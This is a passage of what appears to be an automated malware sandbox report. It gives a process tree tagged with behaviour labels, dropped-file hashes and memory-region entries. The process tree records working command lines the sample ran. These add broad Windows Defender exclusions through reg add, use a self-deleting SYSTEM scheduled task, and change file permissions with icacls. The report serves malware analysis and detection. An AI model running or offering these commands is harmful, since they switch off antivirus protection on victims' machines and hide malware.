                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:5628
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  PID:4924
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:5488
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\XPSPLOG.dll" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  PID:5796
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\kdZdbo\XPSPLOG.dll" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:2344
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • System Location Discovery: System Language Discovery
                                  PID:6836
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1800
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                      PID:2904
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:7036
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:4140
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\kdZdbo\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:2092
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\kdZdbo\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:4272
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\kdZdbo\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:5168
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    PID:2376
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:5052
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1608
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:7164
                              • C:\Users\Public\gWKVEw\VAzRLL.exe
                                "C:\Users\Public\gWKVEw\VAzRLL.exe"
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:3944
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\gWKVEw" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:1988
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\gWKVEw" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:7136
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:4872
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:2236
                              • C:\Windows\system32\cmd.exe
                                cmd.exe
                                1⤵
                                  PID:4944
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:1840
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:7096
                                • C:\Program Files (x86)\kdZdbo\GD1czk.exe
                                  "C:\Program Files (x86)\kdZdbo\GD1czk.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:476
                                • C:\Program Files (x86)\Kzrfi\1oC9g.exe
                                  "C:\Program Files (x86)\Kzrfi\1oC9g.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:4908
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\kdZdbo" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:5344
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\kdZdbo" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5692
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:5468
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:3340
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:1600
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:2764
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:2928
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:5148
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:4968
                                  • C:\Windows\System32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:6156
                                • C:\ProgramData\NoE0gyYh.exe
                                  "C:\ProgramData\NoE0gyYh.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5912
                                • C:\ProgramData\pyrl8DM9\gTGrwpQT.exe
                                  "C:\ProgramData\pyrl8DM9\gTGrwpQT.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6348
                                • C:\Program Files (x86)\Kzrfi\1oC9g.exe
                                  "C:\Program Files (x86)\Kzrfi\1oC9g.exe"
                                  1⤵
                                    PID:5016
                                  • C:\ProgramData\EJHdQNMF\pkyHvEfk.exe
                                    "C:\ProgramData\EJHdQNMF\pkyHvEfk.exe" 1776
                                    1⤵
                                      PID:5716
                                    • C:\Program Files (x86)\kdZdbo\GD1czk.exe
                                      "C:\Program Files (x86)\kdZdbo\GD1czk.exe"
                                      1⤵
                                        PID:4688

                                      Network

                                            MITRE ATT&CK Enterprise v16

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            XPSPLOG.dll

                                            • Path C:\Program Files (x86)\Kzrfi\XPSPLOG.dll
                                            • Size 4.6MB
                                            • SHA256 9a355b1642b2085ea1f79d12fea4fa66731b7d58f567f8676c364a8f643ef531
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            image.png

                                            • Path C:\Program Files (x86)\Kzrfi\image.png
                                            • Size 5.0MB
                                            • SHA256 7419bc64138e8cc6218326ee065047f227cd6fac1316f4c8e002e0b35e95ce15
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            GD1czk.exe

                                            • Path C:\Program Files (x86)\kdZdbo\GD1czk.exe
                                            • Size 145KB
                                            • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            XPSPLOG.dll

                                            • Path C:\Program Files (x86)\kdZdbo\XPSPLOG.dll
                                            • Size 4.6MB
                                            • SHA256 c1e34b688f2ee81833b1390ee40d60d1e292195cd27473badf53ad7d5a5dfebe
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            image.png

                                            • Path C:\Program Files (x86)\kdZdbo\image.png
                                            • Size 5.0MB
                                            • SHA256 09a72c893f69723dfed75afbdc19a8413b8354398f97287fad6128e9816ae4cc
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            thumbs.db

                                            • Path C:\Program Files (x86)\kdZdbo\thumbs.db
                                            • Size 358KB
                                            • SHA256 97779d9a12b38c5c252c85560d35a3fbe203e2ea1159f91dfb93c92f64abd760
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            pkyHvEfk.exe

                                            • Path C:\ProgramData\EJHdQNMF\pkyHvEfk.exe
                                            • Size 663KB
                                            • SHA256 76cfded8a1accb7d94294630b378fdc75d6acbbb87b75e43c1fe4732d21c92d4
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            NoE0gyYh.exe

                                            • Path C:\ProgramData\NoE0gyYh.exe
                                            • Size 2.8MB
                                            • SHA256 4367ca3bf80f6e2318620a7e6058c300cf0243bd196ed8190355e9e6e2ab862a
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            gTGrwpQT.dat

                                            • Path C:\ProgramData\pyrl8DM9\gTGrwpQT.dat
                                            • Size 56KB
                                            • SHA256 57421603090263bf158bf47d99201a4042529eab92996188d33af19b22f9776f
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            gTGrwpQT.exe

                                            • Path C:\ProgramData\pyrl8DM9\gTGrwpQT.exe
                                            • Size 475KB
                                            • SHA256 7aa970de4c5c52cff66e9f1e68e2744234f890f78da096e8c6c8aa773d6ca891
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            gTGrwpQT.png

                                            • Path C:\ProgramData\pyrl8DM9\gTGrwpQT.png
                                            • Size 167KB
                                            • SHA256 8fd008ae523606e388e140b431911a1f68297e6b6fdb12f78315fe63e836af94
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B

                                            • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B
                                            • Size 1KB
                                            • SHA256 d548ab88512cddf39a65fd00d39010e8d29ba16adfcf5423a6cdd78a35c63f8e
                                            • MD5 SHA1 SHA512 TLSH

                                            B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240

                                            • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240
                                            • Size 1KB
                                            • SHA256 fd3ac2ca7f741c905e3a4b1be915c8e182260f27ead9964d4f1519c1dfd85220
                                            • MD5 SHA1 SHA512 TLSH

                                            D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD

                                            • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD
                                            • Size 1KB
                                            • SHA256 e47f96c9d6a6fa8b8568e7b22ff12a4458e03148c322ab60d76c1712bb743dec
                                            • MD5 SHA1 SHA512 TLSH

                                            0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B

                                            • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B
                                            • Size 508B
                                            • SHA256 f5727b904c4b14a955d24435e3940ffe8e214d6467ae61355c291706399e9a26
                                            • MD5 SHA1 SHA512 TLSH

                                            B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240

                                            • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240
                                            • Size 510B
                                            • SHA256 b47cafd871387973e09ce2b6ecb26b3375ec2daa5ad316fb304b1b1296dfa0a5
                                            • MD5 SHA1 SHA512 TLSH

                                            D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD

                                            • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD
                                            • Size 540B
                                            • SHA256 63d1f5145664c7cefa2b4b28608f20a95a785c365b466593fc255d235444cd3a
                                            • MD5 SHA1 SHA512 TLSH

                                            StartupProfileData-NonInteractive

                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            • Size 1KB
                                            • SHA256 f9591acd34626f30580bd2da1aa38e76f26a236347c4dea2c38616a29e2e1a4c
                                            • MD5 SHA1 SHA512 TLSH

                                            __PSScriptPolicyTest_qjm1lhdu.zof.ps1

                                            • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjm1lhdu.zof.ps1
                                            • Size 60B
                                            • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                            • MD5 SHA1 SHA512 TLSH

                                            destopbak.ini

                                            • Path C:\Users\Public\Music\destopbak.ini
                                            • Size 2B
                                            • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                            • MD5 SHA1 SHA512

                                            UxEnhance64.dll

                                            • Path C:\Users\Public\gWKVEw\UxEnhance64.dll
                                            • Size 3.1MB
                                            • SHA256 120c14b6362409a4d944705a1c4998cb775b493a4456bb0823ed02a10255721c
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            VAzRLL.exe

                                            • Path C:\Users\Public\gWKVEw\VAzRLL.exe
                                            • Size 135KB
                                            • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            adoresd.dat

                                            • Path C:\Users\Public\gWKVEw\adoresd.dat
                                            • Size 4.7MB
                                            • SHA256 8d4340986ed2d11f3d11a560378a1010a4a28f880bc64dd98b04650eea3c1c19
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            msadox.tb

                                            • Path C:\Users\Public\gWKVEw\msadox.tb
                                            • Size 8KB
                                            • SHA256 7c78b90f670ad8816daedfcf268498aa5a75f88f84e8dca5c8a99b96fb56b888
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            xxxx.ini

                                            • Path \??\c:\xxxx.ini
                                            • Size 2B
                                            • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                            • MD5 SHA1 SHA512

                                            memory/476-735-0x0000000000C20000-0x0000000000C21000-memory.dmp

                                            memory/476-736-0x0000000074DD0000-0x000000007551A000-memory.dmp

                                            memory/2672-535-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-565-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-564-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-562-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-557-0x0000021306960000-0x00000213069EA000-memory.dmp

                                            memory/2672-559-0x0000021306960000-0x00000213069EA000-memory.dmp

                                            memory/2672-560-0x0000021306960000-0x00000213069EA000-memory.dmp

                                            memory/2672-556-0x0000021306960000-0x00000213069EA000-memory.dmp

                                            memory/2672-555-0x0000021305540000-0x000002130558E000-memory.dmp

                                            memory/2672-549-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-545-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-544-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-543-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-542-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-538-0x00000213060C0000-0x0000021306951000-memory.dmp

                                            memory/2672-537-0x00007FF8777A0000-0x00007FF8777A2000-memory.dmp

                                            memory/2672-530-0x00007FF854B80000-0x00007FF85509E000-memory.dmp

                                            memory/2672-529-0x00007FF877790000-0x00007FF877792000-memory.dmp

                                            memory/3944-577-0x00007FF8777A0000-0x00007FF8777A2000-memory.dmp

                                            memory/3944-583-0x000001D1064E0000-0x000001D106D71000-memory.dmp

                                            memory/3944-575-0x000001D1064E0000-0x000001D106D71000-memory.dmp

                                            memory/3944-571-0x00007FF854B80000-0x00007FF85509E000-memory.dmp

                                            memory/3944-578-0x000001D1064E0000-0x000001D106D71000-memory.dmp

                                            memory/3944-586-0x00007FF877790000-0x00007FF877792000-memory.dmp

                                            memory/3944-585-0x000001D1064E0000-0x000001D106D71000-memory.dmp

                                            memory/3944-584-0x000001D1064E0000-0x000001D106D71000-memory.dmp

                                            memory/3944-582-0x000001D1064E0000-0x000001D106D71000-memory.dmp

                                            memory/4688-857-0x00000000016D0000-0x00000000016D1000-memory.dmp

                                            memory/4688-850-0x0000000003B00000-0x0000000004307000-memory.dmp

                                            memory/4688-847-0x0000000074DD0000-0x000000007551A000-memory.dmp

                                            memory/4688-846-0x0000000001200000-0x0000000001201000-memory.dmp

                                            memory/4764-774-0x0000000007030000-0x000000000704A000-memory.dmp

                                            memory/4764-765-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

                                            memory/4764-776-0x00000000072A0000-0x0000000007336000-memory.dmp

                                            memory/4764-773-0x0000000007670000-0x0000000007CEC000-memory.dmp

                                            memory/4764-772-0x0000000006EF0000-0x0000000006F93000-memory.dmp

                                            memory/4764-771-0x0000000006E90000-0x0000000006EB0000-memory.dmp

                                            memory/4764-768-0x00000000731F0000-0x000000007323C000-memory.dmp

                                            memory/4764-767-0x0000000006EB0000-0x0000000006EE6000-memory.dmp

                                            memory/4764-766-0x0000000005D00000-0x0000000005D4C000-memory.dmp

                                            memory/4764-775-0x00000000070A0000-0x00000000070AA000-memory.dmp

                                            memory/4764-756-0x00000000047F0000-0x0000000004826000-memory.dmp

                                            memory/4764-757-0x0000000004F00000-0x000000000554A000-memory.dmp

                                            memory/4764-758-0x0000000005550000-0x0000000005572000-memory.dmp

                                            memory/4764-777-0x0000000007220000-0x0000000007231000-memory.dmp

                                            memory/4764-761-0x00000000056F0000-0x0000000005756000-memory.dmp

                                            memory/4764-762-0x00000000057F0000-0x0000000005856000-memory.dmp

                                            memory/4764-763-0x0000000005890000-0x0000000005BEB000-memory.dmp

                                            memory/4908-748-0x00000000024E0000-0x00000000024E1000-memory.dmp

                                            memory/4908-741-0x0000000000D10000-0x0000000000D11000-memory.dmp

                                            memory/4908-752-0x0000000000D10000-0x0000000000D11000-memory.dmp

                                            memory/4908-749-0x0000000003180000-0x0000000003987000-memory.dmp

                                            memory/4908-742-0x0000000073010000-0x000000007375A000-memory.dmp

                                            memory/4908-746-0x0000000003180000-0x0000000003987000-memory.dmp

                                            memory/5016-853-0x0000000003BC0000-0x00000000043C7000-memory.dmp

                                            memory/5016-852-0x0000000002F40000-0x0000000002F41000-memory.dmp

                                            memory/5016-856-0x0000000001630000-0x0000000001631000-memory.dmp

                                            memory/5016-844-0x0000000003BC0000-0x00000000043C7000-memory.dmp

                                            memory/5016-841-0x0000000072700000-0x0000000072E4A000-memory.dmp

                                            memory/5016-840-0x0000000001630000-0x0000000001631000-memory.dmp

                                            memory/5716-877-0x00007FF617100000-0x00007FF61752F000-memory.dmp

                                            memory/5716-835-0x00007FF617100000-0x00007FF61752F000-memory.dmp

                                            memory/5716-837-0x000001D54FE70000-0x000001D54FE90000-memory.dmp

                                            memory/5852-607-0x00000255D41F0000-0x00000255D41FA000-memory.dmp

                                            memory/5852-604-0x00000255D4410000-0x00000255D442E000-memory.dmp

                                            memory/5852-601-0x00000255D41B0000-0x00000255D41D2000-memory.dmp

                                            memory/5852-605-0x00000255D4430000-0x00000255D44E2000-memory.dmp

                                            memory/5912-793-0x0000000000A00000-0x0000000000EC1000-memory.dmp

                                            memory/6208-693-0x00000000024B0000-0x00000000024C4000-memory.dmp

                                            memory/6208-675-0x0000000074DD0000-0x000000007551A000-memory.dmp

                                            memory/6208-700-0x0000000010000000-0x0000000010061000-memory.dmp

                                            memory/6208-694-0x0000000002F70000-0x0000000003777000-memory.dmp

                                            memory/6208-686-0x0000000002F70000-0x0000000003777000-memory.dmp

                                            memory/6208-683-0x0000000002F70000-0x0000000003777000-memory.dmp

                                            memory/6208-753-0x0000000002F70000-0x0000000003777000-memory.dmp

                                            memory/6208-679-0x0000000002F70000-0x0000000003777000-memory.dmp

                                            memory/6208-681-0x00000000006B0000-0x00000000006B1000-memory.dmp

                                            memory/6208-724-0x0000000002F70000-0x0000000003777000-memory.dmp

                                            memory/6208-726-0x0000000002F70000-0x0000000003777000-memory.dmp

                                            memory/6208-674-0x0000000000680000-0x0000000000681000-memory.dmp

                                            memory/6208-779-0x0000000004EB0000-0x0000000004EE1000-memory.dmp

                                            memory/6348-803-0x0000000000400000-0x000000000053F000-memory.dmp

                                            memory/6348-821-0x0000000010000000-0x000000001002E000-memory.dmp

                                            memory/6348-825-0x0000000010000000-0x000000001002E000-memory.dmp

                                            memory/6348-819-0x0000000002730000-0x0000000002731000-memory.dmp

                                            memory/6348-875-0x0000000000400000-0x000000000053F000-memory.dmp

                                            memory/7108-524-0x00007FF86F290000-0x00007FF86F2A2000-memory.dmp

                                            memory/7108-1-0x00000000044D0000-0x00000000044DC000-memory.dmp

                                            memory/7108-503-0x00007FF86F290000-0x00007FF86F2A2000-memory.dmp

                                            memory/7108-523-0x00000000044B0000-0x00000000044BE000-memory.dmp

                                            memory/7108-0-0x00000000044B0000-0x00000000044BE000-memory.dmp